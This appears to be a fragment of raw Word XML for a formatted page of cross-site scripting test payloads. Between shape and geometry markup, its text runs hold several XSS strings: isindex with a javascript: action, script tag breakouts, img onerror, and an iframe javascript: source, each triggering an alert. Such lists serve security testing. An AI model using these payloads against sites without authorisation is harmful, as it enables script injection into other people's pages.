                <v:shape id="Freeform 150" o:spid="_x0000_s2194" style="position:absolute;left:1930;top:169;width:4277;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="42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Dj4McA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT0/DMAzF75P4DpGRdkEsZUwblGUTmkBDu63AgZvV&#10;uH9E45QkdN23xwek3Wy95/d+Xm9H16mBQmw9G7ibZaCIS29brg18vL/ePoCKCdli55kMnCnCdnM1&#10;WWNu/YmPNBSpVhLCMUcDTUp9rnUsG3IYZ74nFq3ywWGSNdTaBjxJuOv0PMuW2mHL0tBgT7uGyu/i&#10;1xmoFj/FfRx2N21YVY+rr0MWPvcvxkyvx+cnUInGdDH/X79ZwV8IrTwjE+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g4+DHAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m4256,182l21,182r-3,l,161r,-3l,21,21,,4256,r21,21l4277,161r-18,21l4256,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4256,351;21,351;18,351;0,330;0,327;0,190;21,169;4256,169;4277,190;4277,330;4259,351;4256,351" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 149" o:spid="_x0000_s2195" type="#_x0000_t202" style="position:absolute;left:1930;top:169;width:427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Bss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kGy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&lt;isindex</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="60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x="javascript:"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="61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onmouseover="alert(XSS)"&gt;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3513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369570</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="146" name="Freeform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631 582"/>
                            <a:gd name="T3" fmla="*/ 631 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 631 582"/>
                            <a:gd name="T7" fmla="*/ 631 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 630 582"/>
                            <a:gd name="T11" fmla="*/ 630 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 610 582"/>
                            <a:gd name="T15" fmla="*/ 610 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 603 582"/>
                            <a:gd name="T19" fmla="*/ 603 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 582 582"/>
                            <a:gd name="T23" fmla="*/ 582 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 582 582"/>
                            <a:gd name="T27" fmla="*/ 582 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 607 582"/>
                            <a:gd name="T31" fmla="*/ 607 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 610 582"/>
                            <a:gd name="T35" fmla="*/ 610 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 631 582"/>
                            <a:gd name="T39" fmla="*/ 63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D59AB" id="Freeform 147" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:29.1pt;width:2.45pt;height:2.45pt;z-index:-15481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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,400685;13335,400685;11430,400050;0,387350;0,382905;13335,369570;17780,369570;31115,385445;31115,387350;17780,40068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3564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323215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3680460" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="143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0460" cy="116205"/>
                          <a:chOff x="1930" y="509"/>
                          <a:chExt cx="5796" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="144" name="Freeform 146"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="509"/>
                            <a:ext cx="5796" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7705 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 5796"/>
                              <a:gd name="T2" fmla="+- 0 692 509"/>
                              <a:gd name="T3" fmla="*/ 692 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 5796"/>
                              <a:gd name="T6" fmla="+- 0 692 509"/>
                              <a:gd name="T7" fmla="*/ 692 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 5796"/>
                              <a:gd name="T10" fmla="+- 0 691 509"/>
                              <a:gd name="T11" fmla="*/ 691 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 5796"/>
                              <a:gd name="T14" fmla="+- 0 671 509"/>
                              <a:gd name="T15" fmla="*/ 671 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 5796"/>
                              <a:gd name="T18" fmla="+- 0 667 509"/>
                              <a:gd name="T19" fmla="*/ 667 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 5796"/>
                              <a:gd name="T22" fmla="+- 0 530 509"/>
                              <a:gd name="T23" fmla="*/ 530 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 5796"/>
                              <a:gd name="T26" fmla="+- 0 509 509"/>
                              <a:gd name="T27" fmla="*/ 509 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7705 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 5796"/>
                              <a:gd name="T30" fmla="+- 0 509 509"/>
                              <a:gd name="T31" fmla="*/ 509 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7726 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 5796"/>
                              <a:gd name="T34" fmla="+- 0 530 509"/>
                              <a:gd name="T35" fmla="*/ 530 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7726 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 5796"/>
                              <a:gd name="T38" fmla="+- 0 671 509"/>
                              <a:gd name="T39" fmla="*/ 671 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7708 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 5796"/>
                              <a:gd name="T42" fmla="+- 0 691 509"/>
                              <a:gd name="T43" fmla="*/ 691 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7705 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 5796"/>
                              <a:gd name="T46" fmla="+- 0 692 509"/>
                              <a:gd name="T47" fmla="*/ 69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96" h="183">
                                <a:moveTo>
                                  <a:pt x="577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775" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5796" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5796" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5778" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="577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09"/>
                            <a:ext cx="579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 w:hAns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 w:hAnsi="Lucida Console"/>
                                  <w:color w:val="36454E"/>
                                  <w:w w:val="90"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>"&gt;&lt;/SCRIPT&gt;”&gt;’&gt;&lt;SCRIPT&gt;</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
                                  <w:color w:val="36454E"/>
                                  <w:w w:val="90"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;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4" o:spid="_x0000_s2196" style="position:absolute;margin-left:96.5pt;margin-top:25.45pt;width:289.8pt;height:9.15pt;z-index:-15480832;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,509" coordsize="579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">
                <v:shape id="Freeform 146" o:spid="_x0000_s2197" style="position:absolute;left:1930;top:509;width:5796;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="579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If4sEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2sCMRC+C/0PYQq9aVaxRVajFLXSevMFHofNuLt0&#10;M1mSUbf/vikUvM3H95zZonONulGItWcDw0EGirjwtubSwPHw0Z+AioJssfFMBn4owmL+1Jthbv2d&#10;d3TbS6lSCMccDVQiba51LCpyGAe+JU7cxQeHkmAotQ14T+Gu0aMse9MOa04NFba0rKj43l+dgfOu&#10;WZ9os/Hb7euX4GpoR+Ekxrw8d+9TUEKdPMT/7k+b5o/H8PdMukDP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SH+LBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m5775,183l21,183r-3,-1l,162r,-4l,21,21,,5775,r21,21l5796,162r-18,20l5775,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5775,692;21,692;18,691;0,671;0,667;0,530;21,509;5775,509;5796,530;5796,671;5778,691;5775,692" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 145" o:spid="_x0000_s2198" type="#_x0000_t202" style="position:absolute;left:1930;top:509;width:579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NLt8MA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91Y2lF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8NLt8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 w:hAnsi="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:w w:val="90"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>"&gt;&lt;/SCRIPT&gt;”&gt;’&gt;&lt;SCRIPT&gt;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:w w:val="90"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;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3616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593725</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="142" name="Freeform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983 935"/>
                            <a:gd name="T3" fmla="*/ 983 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 983 935"/>
                            <a:gd name="T7" fmla="*/ 983 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 983 935"/>
                            <a:gd name="T11" fmla="*/ 983 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 962 935"/>
                            <a:gd name="T15" fmla="*/ 962 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 956 935"/>
                            <a:gd name="T19" fmla="*/ 956 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 935 935"/>
                            <a:gd name="T23" fmla="*/ 935 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 935 935"/>
                            <a:gd name="T27" fmla="*/ 935 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 959 935"/>
                            <a:gd name="T31" fmla="*/ 959 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 962 935"/>
                            <a:gd name="T35" fmla="*/ 962 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 983 935"/>
                            <a:gd name="T39" fmla="*/ 983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D343C" id="Freeform 143" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:46.75pt;width:2.45pt;height:2.45pt;z-index:-15480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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,624205;13335,624205;11430,624205;0,610870;0,607060;13335,593725;17780,593725;31115,608965;31115,610870;17780,62420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3667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547370</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2075815" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="139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5815" cy="116205"/>
                          <a:chOff x="1930" y="862"/>
                          <a:chExt cx="3269" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="140" name="Freeform 142"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="861"/>
                            <a:ext cx="3269" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5178 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 3269"/>
                              <a:gd name="T2" fmla="+- 0 1044 862"/>
                              <a:gd name="T3" fmla="*/ 1044 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 3269"/>
                              <a:gd name="T6" fmla="+- 0 1044 862"/>
                              <a:gd name="T7" fmla="*/ 1044 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 3269"/>
                              <a:gd name="T10" fmla="+- 0 1043 862"/>
                              <a:gd name="T11" fmla="*/ 1043 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 3269"/>
                              <a:gd name="T14" fmla="+- 0 1023 862"/>
                              <a:gd name="T15" fmla="*/ 1023 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 3269"/>
                              <a:gd name="T18" fmla="+- 0 1020 862"/>
                              <a:gd name="T19" fmla="*/ 1020 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 3269"/>
                              <a:gd name="T22" fmla="+- 0 883 862"/>
                              <a:gd name="T23" fmla="*/ 883 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 3269"/>
                              <a:gd name="T26" fmla="+- 0 862 862"/>
                              <a:gd name="T27" fmla="*/ 862 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5178 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 3269"/>
                              <a:gd name="T30" fmla="+- 0 862 862"/>
                              <a:gd name="T31" fmla="*/ 862 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5199 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 3269"/>
                              <a:gd name="T34" fmla="+- 0 883 862"/>
                              <a:gd name="T35" fmla="*/ 883 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5199 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 3269"/>
                              <a:gd name="T38" fmla="+- 0 1023 862"/>
                              <a:gd name="T39" fmla="*/ 1023 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5181 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 3269"/>
                              <a:gd name="T42" fmla="+- 0 1043 862"/>
                              <a:gd name="T43" fmla="*/ 1043 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5178 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 3269"/>
                              <a:gd name="T46" fmla="+- 0 1044 862"/>
                              <a:gd name="T47" fmla="*/ 104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269" h="183">
                                <a:moveTo>
                                  <a:pt x="324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248" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3269" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3269" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3251" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="324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861"/>
                            <a:ext cx="326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src="x:x"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4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onerror="alert(XSS)"&gt;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0" o:spid="_x0000_s2199" style="position:absolute;margin-left:96.5pt;margin-top:43.1pt;width:163.45pt;height:9.15pt;z-index:-15479808;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,862" coordsize="326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">
                <v:shape id="Freeform 142" o:spid="_x0000_s2200" style="position:absolute;left:1930;top:861;width:3269;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="326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I+DcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF7wX/wzJCb3XTotKmriJCJQfF1ha8Dtlp&#10;EpqdXbIbTf+9cxC8zfDevPfNYjW4Vp2pi41nA8+TDBRx6W3DlYGf74+nV1AxIVtsPZOBf4qwWo4e&#10;Fphbf+EvOh9TpSSEY44G6pRCrnUsa3IYJz4Qi/brO4dJ1q7StsOLhLtWv2TZXDtsWBpqDLSpqfw7&#10;9s7A23ZWBH/og91veyp3BZ8+pydjHsfD+h1UoiHdzbfrwgr+VPDlGZlAL6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4j4NxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3248,182l21,182r-3,-1l,161r,-3l,21,21,,3248,r21,21l3269,161r-18,20l3248,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3248,1044;21,1044;18,1043;0,1023;0,1020;0,883;21,862;3248,862;3269,883;3269,1023;3251,1043;3248,1044" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 141" o:spid="_x0000_s2201" type="#_x0000_t202" style="position:absolute;left:1930;top:861;width:326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hNtM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hNtM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"&gt;&lt;img</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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src="x:x"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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onerror="alert(XSS)"&gt;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3718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809625</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="138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323 1275"/>
                            <a:gd name="T3" fmla="*/ 1323 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 1323 1275"/>
                            <a:gd name="T7" fmla="*/ 1323 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 1323 1275"/>
                            <a:gd name="T11" fmla="*/ 1323 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 1302 1275"/>
                            <a:gd name="T15" fmla="*/ 1302 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 1296 1275"/>
                            <a:gd name="T19" fmla="*/ 1296 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 1275 1275"/>
                            <a:gd name="T23" fmla="*/ 1275 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 1275 1275"/>
                            <a:gd name="T27" fmla="*/ 1275 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 1299 1275"/>
                            <a:gd name="T31" fmla="*/ 1299 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 1302 1275"/>
                            <a:gd name="T35" fmla="*/ 1302 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 1323 1275"/>
                            <a:gd name="T39" fmla="*/ 1323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F8C84" id="Freeform 139" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:63.75pt;width:2.45pt;height:2.45pt;z-index:-15479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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,840105;13335,840105;11430,840105;0,826770;0,822960;13335,809625;17780,809625;31115,824865;31115,826770;17780,84010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3769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763270</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2075815" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="135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5815" cy="116205"/>
                          <a:chOff x="1930" y="1202"/>
                          <a:chExt cx="3269" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="136" name="Freeform 138"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="1201"/>
                            <a:ext cx="3269" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5178 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 3269"/>
                              <a:gd name="T2" fmla="+- 0 1384 1202"/>
                              <a:gd name="T3" fmla="*/ 1384 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 3269"/>
                              <a:gd name="T6" fmla="+- 0 1384 1202"/>
                              <a:gd name="T7" fmla="*/ 1384 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 3269"/>
                              <a:gd name="T10" fmla="+- 0 1384 1202"/>
                              <a:gd name="T11" fmla="*/ 1384 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 3269"/>
                              <a:gd name="T14" fmla="+- 0 1363 1202"/>
                              <a:gd name="T15" fmla="*/ 1363 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 3269"/>
                              <a:gd name="T18" fmla="+- 0 1360 1202"/>
                              <a:gd name="T19" fmla="*/ 1360 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 3269"/>
                              <a:gd name="T22" fmla="+- 0 1223 1202"/>
                              <a:gd name="T23" fmla="*/ 1223 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 3269"/>
                              <a:gd name="T26" fmla="+- 0 1202 1202"/>
                              <a:gd name="T27" fmla="*/ 1202 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5178 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 3269"/>
                              <a:gd name="T30" fmla="+- 0 1202 1202"/>
                              <a:gd name="T31" fmla="*/ 1202 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5199 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 3269"/>
                              <a:gd name="T34" fmla="+- 0 1223 1202"/>
                              <a:gd name="T35" fmla="*/ 1223 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5199 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 3269"/>
                              <a:gd name="T38" fmla="+- 0 1363 1202"/>
                              <a:gd name="T39" fmla="*/ 1363 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5181 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 3269"/>
                              <a:gd name="T42" fmla="+- 0 1384 1202"/>
                              <a:gd name="T43" fmla="*/ 1384 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5178 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 3269"/>
                              <a:gd name="T46" fmla="+- 0 1384 1202"/>
                              <a:gd name="T47" fmla="*/ 138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269" h="183">
                                <a:moveTo>
                                  <a:pt x="324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248" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3269" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3269" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3251" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="324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201"/>
                            <a:ext cx="326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"&gt;&lt;iframe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7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src="javascript:alert(XSS)"&gt;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" o:spid="_x0000_s2202" style="position:absolute;margin-left:96.5pt;margin-top:60.1pt;width:163.45pt;height:9.15pt;z-index:-15478784;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,1202" coordsize="326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">
                <v:shape id="Freeform 138" o:spid="_x0000_s2203" style="position:absolute;left:1930;top:1201;width:3269;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="326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Fwn8MA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxR6q5vWKjVmI6Wg5FBpq4LXITsm&#10;wezskt1o/PduoeBtHu9zsuVgWnGmzjeWFbyMExDEpdUNVwr2u9XzOwgfkDW2lknBlTws84dRhqm2&#10;F/6l8zZUIoawT1FBHYJLpfRlTQb92DriyB1tZzBE2FVSd3iJ4aaVr0kykwYbjg01OvqsqTxte6Ng&#10;vp4Wzn73Tm/WPZVfBR9+3g5KPT0OHwsQgYZwF/+7Cx3nT2bw90y8QO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Fwn8MAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m3248,182l21,182r-3,l,161r,-3l,21,21,,3248,r21,21l3269,161r-18,21l3248,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3248,1384;21,1384;18,1384;0,1363;0,1360;0,1223;21,1202;3248,1202;3269,1223;3269,1363;3251,1384;3248,1384" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
